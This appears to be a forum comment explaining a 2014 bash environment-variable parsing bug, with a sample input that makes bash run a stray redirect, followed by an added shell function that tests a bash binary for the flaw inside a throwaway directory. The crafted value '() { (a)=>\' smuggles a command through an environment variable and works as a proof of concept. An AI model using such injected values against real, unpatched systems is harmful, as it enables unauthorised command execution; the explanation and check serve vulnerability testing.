by timv
4285 days ago
Am I missing something? I think so, but the sample exploit isn't really designed to give a clear understanding if you don't already know what's going on. Try this:

$ export X="() { (a)=>\\"
$ bash -c 'echo date'
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
$ cat echo
Thu Sep 25 02:27:07 UTC 2014
Setting "X" in that way confuses the bash env variable parser. It barfs at the "=" and leaves the ">\" unparsed.

AFAICT (without digging deep into the code) that's left in the execution buffer as ">\[NEWLINE]echo date" which gets treated the same as

date > echo
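
A contained way to run the check from the comment above against a given bash binary, as an added example that is not part of the original comment. The function name `bash_env_parse_check` and its return codes are assumptions made for this example.

```shell
# Added example: reports whether a bash binary still mis-parses the value
# from the comment above. Name and return codes are chosen for this example.
#   0 = affected (a file named "echo" was created)
#   1 = not affected
#   2 = could not run the check
bash_env_parse_check() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || return 2

    # Work in a throwaway directory so a stray redirect cannot touch real files.
    workdir="$(mktemp -d)" || return 2

    if (
        cd "$workdir" || exit 1
        # Single quotes keep the backslash literal, so X holds the same value
        # as the double-quoted "() { (a)=>\\" in the comment.
        X='() { (a)=>\' "$bash_bin" -c 'echo date' >/dev/null 2>&1
        # On an affected bash the leftover ">\" turns "echo date" into
        # "date > echo", so a file named "echo" appears in the directory.
        # A fixed bash treats X as plain data and just prints "date".
        [ -e echo ]
    ); then
        result=0
    else
        result=1
    fi

    rm -rf "$workdir"
    return "$result"
}
```

Call it as `bash_env_parse_check /path/to/bash` and read the exit status; with no argument it tests the `bash` found on `PATH`.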